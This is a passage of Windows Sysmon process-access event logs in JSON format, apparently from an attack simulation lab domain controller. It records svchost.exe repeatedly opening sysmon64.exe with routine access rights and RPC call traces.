C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.837","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1725,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.837\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.837","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1726,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.837\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.837","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1727,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.837\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.837","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1728,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.837\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.837","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1729,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.838\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.838","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1730,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.838\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.838","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1731,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.838\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.838","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1732,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.838\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 